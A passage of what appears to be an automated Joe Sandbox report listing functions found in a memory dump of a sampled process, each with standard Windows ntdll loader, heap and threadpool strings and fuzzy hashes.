LdrpInitializeProcess, xrefs: 01BE8422

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 9379f5c1ab2348652e811daf0442eb91ae77f40a16befb498a3499c28676e3bc
Instruction ID: 6312a341ce2a01d3c6ed6a93fc282d973c00b5604e251fefe1f84c17b53b4c59
Opcode Fuzzy Hash: 9379f5c1ab2348652e811daf0442eb91ae77f40a16befb498a3499c28676e3bc
Instruction Fuzzy Hash: B0919B71508745AFDB26EF65CC84FABBAE8FB84744F4009AEFA84D2151E730D944CB62

Function 01BE273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01C221D9, 01C222B1
.Local, xrefs: 01BE28D8
SXS: %s() passed the empty activation context, xrefs: 01C221DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01C222B6

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 84bc5612421e4a88eb4d4986d4c5d968aab29254538047d4f7a4924e3b143e6f
Instruction ID: f3daf2510e920099731ccdfbe541283c8565d8e0da629cf22b682ae16b9c2c83
Opcode Fuzzy Hash: 84bc5612421e4a88eb4d4986d4c5d968aab29254538047d4f7a4924e3b143e6f
Instruction Fuzzy Hash: 15A1AD3590022ADBDB29CF68C888BA9B7F5FF59354F2541E9D908AB251D730DE81CF90

Function 01BE4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01C23456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01C2342A
RtlDeactivateActivationContext, xrefs: 01C23425, 01C23432, 01C23451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01C23437

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 79c1ff868d31545f4d761bef6636ac656eba624743fc1240b70266819dd001dd
Instruction ID: 79ca93efc78643250f96caa94cf2ce4b78d6623ea8d3f4f4dcad94b8b9d667a0
Opcode Fuzzy Hash: 79c1ff868d31545f4d761bef6636ac656eba624743fc1240b70266819dd001dd
Instruction Fuzzy Hash: 08612332640B62DBDB2ACF1DC845B2ABBE1FF84B10F1485ADE955DB250C734E901CB95

Function 01BB64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01C10FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01C110AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01C11028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01C1106B

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 4ab362ce6e085c8fc241df7539dc083b61ebda48b72e57ed691d213edd01c75b
Instruction ID: bb06d54bd3e2442e9cd7d3a1ab178d5238d86143ade4999d86abada00b46eb57
Opcode Fuzzy Hash: 4ab362ce6e085c8fc241df7539dc083b61ebda48b72e57ed691d213edd01c75b
Instruction Fuzzy Hash: 8A71D071904309DFCB21DF14C8C4BAB7BA8EF95754F4404A8F9488B586D774D598CBD2

Function 01BD245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01C1A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01C1A992
apphelp.dll, xrefs: 01BD2462
LdrpDynamicShimModule, xrefs: 01C1A998

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 2ff449b3dafc80652f8d68505ec194a832eb5d758fff4c5f76067dbc8fd8a28a
Instruction ID: 8e3cb69304cd3711f2d296533abdb6366e69297418881eeaf58a9fa3497b428d
Opcode Fuzzy Hash: 2ff449b3dafc80652f8d68505ec194a832eb5d758fff4c5f76067dbc8fd8a28a
Instruction Fuzzy Hash: 1A31BD72A402C1EBDB3A9F5DC881F7EBBB5FB91B08F550099E90267259C770D981DB40

Function 01BC29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01BC327D
HEAP[%wZ]: , xrefs: 01BC3255
HEAP: , xrefs: 01BC3264

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 7a38c4f871b056f9822b8a2477ec52497f709c7372baf0b5d31968ea64398848
Instruction ID: a30f5e2cb1db7f0e5bb70558a5212890c9208b434d13f1d8d7f0fb83d51ebb28
Opcode Fuzzy Hash: 7a38c4f871b056f9822b8a2477ec52497f709c7372baf0b5d31968ea64398848
Instruction Fuzzy Hash: FB929A71A042499FDB29CF68C4407AEBBF1FF48B00F5881EDE85AAB261D735A941CF50

Function 01BC0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01C150AE
HEAP: , xrefs: 01C150BD
(UCRBlock->Size >= *Size), xrefs: 01C150CA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b1870243beedcd9caa3e65668351f5e459a4ff15841909635ff3f5359fe6f431
Instruction ID: 7891bf57f36441a26fe36f83ecdd74788a01a1665cd0a4e97d226492970c74ba
Opcode Fuzzy Hash: b1870243beedcd9caa3e65668351f5e459a4ff15841909635ff3f5359fe6f431
Instruction Fuzzy Hash: A2F1C034600606DFEB19DF68C484BAAB7B5FF86704F1482ACE4169B355D770EA81DB90

Function 01BD6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01BD6C24
, xrefs: 01C1CA51

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: a463d585ec876a3415cb03db617edf1316a9ff94acd814a2d48f830fdbcfb116
Instruction ID: d49ba13288331d4ab6828972a9a0a6d15069554e518c882bbfa2a88facbb6ae7
Opcode Fuzzy Hash: a463d585ec876a3415cb03db617edf1316a9ff94acd814a2d48f830fdbcfb116
Instruction Fuzzy Hash: C3C270716083419FDB2DCF29C881BABBBE5AF89714F04896DF989C7251EB34D805CB52

Function 01BAA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 01C0C1E4
UseFilter, xrefs: 01BAA1C1
FilterFullPath, xrefs: 01C0C2E6

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: a9a19f9c2eae73fd1fd8533446979861a3e5813836afc08449cee3b9dc8b8ec0
Instruction ID: 3370b470fa508403ee18b940f9376bfdaab22fdfd9d80d17e2b49ef37a8d71e1
Opcode Fuzzy Hash: a9a19f9c2eae73fd1fd8533446979861a3e5813836afc08449cee3b9dc8b8ec0
Instruction Fuzzy Hash: 3BA16A719116299BDF369B68CC88BEAB7B8EF44700F1142E9EA08A7250D7359F84CF54

Function 01BD0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 01C1A10F
minkernel\ntdll\ldrinit.c, xrefs: 01C1A121
LdrpCheckModule, xrefs: 01C1A117

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: ad0c88d141c548a06ca34cc98069ede5d7d4549eb8078ce8ff21b66c60f6c233
Instruction ID: 92b54fc50010e026da465f2a6f541aa7651481e3873a6950c0acd54636160ef2
Opcode Fuzzy Hash: ad0c88d141c548a06ca34cc98069ede5d7d4549eb8078ce8ff21b66c60f6c233
Instruction Fuzzy Hash: FA719E71A00206DFDF2EEF68C981BBEB7F4EB54608F5840ADE50697255E734EA41CB50

Function 01BEC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 01C282D7
minkernel\ntdll\ldrinit.c, xrefs: 01C282E8
LdrpInitializePerUserWindowsDirectory, xrefs: 01C282DE

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 62cc75aaad56c155389b7b6b74ef503fe9369031d02f79f3986071a11a7c20b7
Instruction ID: 4aebb67335c918397dc25345fcb273e26a15c2e53e5dd8ed1478b249b2c19a84
Opcode Fuzzy Hash: 62cc75aaad56c155389b7b6b74ef503fe9369031d02f79f3986071a11a7c20b7
Instruction Fuzzy Hash: C34154B1540311EBCB3AEB68DC44B5B7BE8EF68B54F44896AF946D3250EB30D800CB91

Function 01C6C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 01C6C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01C6C1C5
PreferredUILanguages, xrefs: 01C6C212

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: b13c5c0645b0f132a2e073c252ba7cbe157f14d6eaa58ded17159fcba19f68d5
Instruction ID: e1620b531bdeefa97d7b3a94d3dc0832a2e825f79844b2fd18195bb2f3eeb11c
Opcode Fuzzy Hash: b13c5c0645b0f132a2e073c252ba7cbe157f14d6eaa58ded17159fcba19f68d5
Instruction Fuzzy Hash: E7416171E0020AEBDF15DBD9C881BEEBBBCAB14704F1440AAEA49E7250D774DA44CB54

Function 01C44144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01C44225
LdrpResValidateFilePath Exit, xrefs: 01C44172
LdrpResValidateFilePath Enter, xrefs: 01C44160

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 195b2e3c4b1e5411dc45332a6f70095b7dc438841b492da5fba72a8ee76bd52c
Instruction ID: b94cb1aecf059ad06d9bf9aa55407c2cde735c9c330a0eca6e4e159216633152
Opcode Fuzzy Hash: 195b2e3c4b1e5411dc45332a6f70095b7dc438841b492da5fba72a8ee76bd52c
Instruction Fuzzy Hash: 8941E172A08649CBEB2ADBD9C840BADBBF4FF55740F24049AD901EB791DB35DA01CB11

Function 01C34755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01C34899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01C34888
LdrpCheckRedirection, xrefs: 01C3488F

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 9acd65a64555ce10a167441f5893130cb957f9e1105d197ef961831ae96701ac
Instruction ID: 422411b224b5809f5830482139c09806d6eaeae1dd8f5d8f62d7740cf34f19ed
Opcode Fuzzy Hash: 9acd65a64555ce10a167441f5893130cb957f9e1105d197ef961831ae96701ac
Instruction Fuzzy Hash: 0C41DF32A14261DFCB2ACE6DD840A26BBE4AFCAB54B050569ED49D7311D730E900CB92

Function 01BC0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01C15431
HEAP: , xrefs: 01C1543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01C15449

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 93cdb5a385df58e33bd1f1ace1ade6e0f15d5a5ec0f2f3dfe9a5aabb6003878e
Instruction ID: 227fb142c2b158e2ba9750e968724f610d9f6c0b1ceca5c456c6b38fdaf8d6be
Opcode Fuzzy Hash: 93cdb5a385df58e33bd1f1ace1ade6e0f15d5a5ec0f2f3dfe9a5aabb6003878e
Instruction Fuzzy Hash: 30110335398142DFDB2DEB18C440B76F3A4EF82A15F58819DF406CB269DB30D880C750

Function 01C320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01C32104
Process initialization failed with status 0x%08lx, xrefs: 01C320F3
LdrpInitializationFailure, xrefs: 01C320FA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6a1eb3ca299ffa405d5b749d3cc249263ca1e8c0aaf1b485526b05b3c2576919
Instruction ID: 29899ca618a902bd59b9743f7988f36fe55a597978c0814c2ea28ebb89bb80b5
Opcode Fuzzy Hash: 6a1eb3ca299ffa405d5b749d3cc249263ca1e8c0aaf1b485526b05b3c2576919
Instruction Fuzzy Hash: 03F0C875640348FBEB28E68DCD53FA67B68EB90B54F5000A9F6007B285D2B0EA01D691

Function 01BC03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01C14D8A

Strings

#%u, xrefs: 01C14D82

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: a368badb861f2c15014eb9fceeba6b274ef832185814a6e813e56a18f85c8881
Instruction ID: a99c75a996f517c811aa4ae434c82cfa4a64e8f4c8ff054640bc72ae3247e7af
Opcode Fuzzy Hash: a368badb861f2c15014eb9fceeba6b274ef832185814a6e813e56a18f85c8881
Instruction Fuzzy Hash: D1713B71A0014ADFDB09DFA8C990BAEB7F8BF18704F1440A9E905E7251EB34EE01CB61

Function 01BBA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 01BBAA13
LdrResSearchResource Exit, xrefs: 01BBAA25

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: d65c09d18690f763309be7cf17ef8f8aa237b08c39f225da2d3f77dcfb3063ca
Instruction ID: 4f90fa05f69f2853cc5bfc1496d3cdf07bff39eeb3d49bd200f71b8b67db2e36
Opcode Fuzzy Hash: d65c09d18690f763309be7cf17ef8f8aa237b08c39f225da2d3f77dcfb3063ca
Instruction Fuzzy Hash: B4E1AF71E40259EBEF29CAA8C980BFEBBB9FF05314F2005A9E901E7655D7B4D940DB10

Function 01C7A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01C7A551
`, xrefs: 01C7A44B

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: f14ef88cfa22724a4793070a1f98c741951f27e358ff4f04bba884c71ecfcfec
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 2AC1CE31204342DBEB25CF29C845B6FBBE5AFC4718F084A2DF6968B290D7B5D645CB81

Function 01C2E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01C2E75A
UEFI, xrefs: 01C2E751

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 0420ac8dc636f33ddf7d59cfdba974fb10c3edf497ccbfa4e0f132ddc3dce6c1
Instruction ID: a6884af5a81948a8b078f6f92dc45c359a23355a3c82b364ffd94e103df8a356
Opcode Fuzzy Hash: 0420ac8dc636f33ddf7d59cfdba974fb10c3edf497ccbfa4e0f132ddc3dce6c1
Instruction Fuzzy Hash: B2613B71E00629DFDB19DFA9C840BAEBBB9FB48700F14406DE649EB291D771E941CB50

Function 01C543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01C54437
MUI, xrefs: 01C54525

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 2397d705842a65631648ab8b31afc37e85667ed80efac28934e54f5362dbc0cc
Instruction ID: 8ba1be8efaf149cfc3d805e0bd3a2e0dbcee0bc1968c623528123bedef09ca73
Opcode Fuzzy Hash: 2397d705842a65631648ab8b31afc37e85667ed80efac28934e54f5362dbc0cc
Instruction Fuzzy Hash: 16512871E0021DAEDF15DFA9CC84AEEBBB8EB44754F100569EA11B7290E730DE85CB64

Function 01BB04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01BB063D
kLsE, xrefs: 01BB0540

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: e6d7af715243d032a9e736dbe1b0bf03ca3712282e5af63a8dd1942bd52375bf
Instruction ID: 97e40bdf53efc621e3f6adf6ea1def2b37370755f9a1c1f4df73ef2313dbfff0
Opcode Fuzzy Hash: e6d7af715243d032a9e736dbe1b0bf03ca3712282e5af63a8dd1942bd52375bf
Instruction Fuzzy Hash: EB519A715047428BD729EF29C4806F7BBF4EF84304F10486EF6AA87A41E7B0E545CB92

Function 01BBA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 01BBA309
RtlpResUltimateFallbackInfo Enter, xrefs: 01BBA2FB

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 6fc1b8d925300dfb194febf272e2c0b4aeea1d20b8a30a6d14800126b7a2e3a3
Instruction ID: bbf7f410023f689e0cc586d54ba2f5dcff3f04be7c7a67a7ef395e776cf3285e
Opcode Fuzzy Hash: 6fc1b8d925300dfb194febf272e2c0b4aeea1d20b8a30a6d14800126b7a2e3a3
Instruction Fuzzy Hash: 5541CF35A05649DBDB29CF69C4C0BBD7BB4FF85700F2440A9E901DBA95E3B5DA00CB50

Function 01BEA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 01BEA5E4
Threadpool!, xrefs: 01BEA5E9

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 1365ab2b41f106c299e222e0233d1bd722b8681c1a87477299e09deb399e4c2f
Instruction ID: 1830fb6bbcdda001c55237b6da4ff69cadd3713e3fbb470f38c0c7cbb48ba617
Opcode Fuzzy Hash: 1365ab2b41f106c299e222e0233d1bd722b8681c1a87477299e09deb399e4c2f
Instruction Fuzzy Hash: 1901DCB2240704AFD326DF24CE49B2677ECF796B29F0589B9B658C7190E334E804CB46

Function 01BBC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01BBC8C3, 01BBCA40

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: ab7b5c59ddd59d2f486525b18dd2e487d7cc37797a4e7bbeb31a41ac9ef7499f
Instruction ID: 26482c0b2ac3715ab91e106678ca4e9b8634b6ce590f87ea08dfa39906d392e6
Opcode Fuzzy Hash: ab7b5c59ddd59d2f486525b18dd2e487d7cc37797a4e7bbeb31a41ac9ef7499f
Instruction Fuzzy Hash: D0826D75E002188FEB29CFA9C8C0BFDBBB1FF48314F1481A9D959ABA51D7B49941CB50

Function 01C36420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01C365C1

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9a392f3e57461eb3a93d52fe24f3cc84d426f9c275ac9ff0ef39cb5023c2d6bf
Instruction ID: 0cb214cfcd3e1a53817b87a35df954ae7e723eff737ffaae2b15697c2bb362e4
Opcode Fuzzy Hash: 9a392f3e57461eb3a93d52fe24f3cc84d426f9c275ac9ff0ef39cb5023c2d6bf
Instruction Fuzzy Hash: DD916371A4022AFBEF25DB95CC85FAEBBB8EF54B50F144065F600AB191D774EA04CB60

Function 01C5E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01C5E1FA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ca7ff2958af15a5918e80ebd027c0aa7350a61c025ac324ef979016da38e76a7
Instruction ID: 04b1c1cc91f26a16cf9a2403994dedce334421e309086c4665b7313a96f544bc
Opcode Fuzzy Hash: ca7ff2958af15a5918e80ebd027c0aa7350a61c025ac324ef979016da38e76a7
Instruction Fuzzy Hash: D3919F72A01609EBDF26ABA5DC44FEFBBB9EF45B40F100029F901A7251D734DA85CB54

Function 01BEA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01C267C9

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 08cabbf312c0fa03f7bc874cc800267b077da5695e9843892891d938f869186b
Instruction ID: 6fe513a678a58b7db9159fa99fe24d6172c84998356fe0585d0622d3800e7744
Opcode Fuzzy Hash: 08cabbf312c0fa03f7bc874cc800267b077da5695e9843892891d938f869186b
Instruction Fuzzy Hash: B5717EB5E0022ACFDF28CF9DD590AADBBB1BF58700F14816EE906A7241E771D941CB60

Function 01C54978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01C54A7F

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

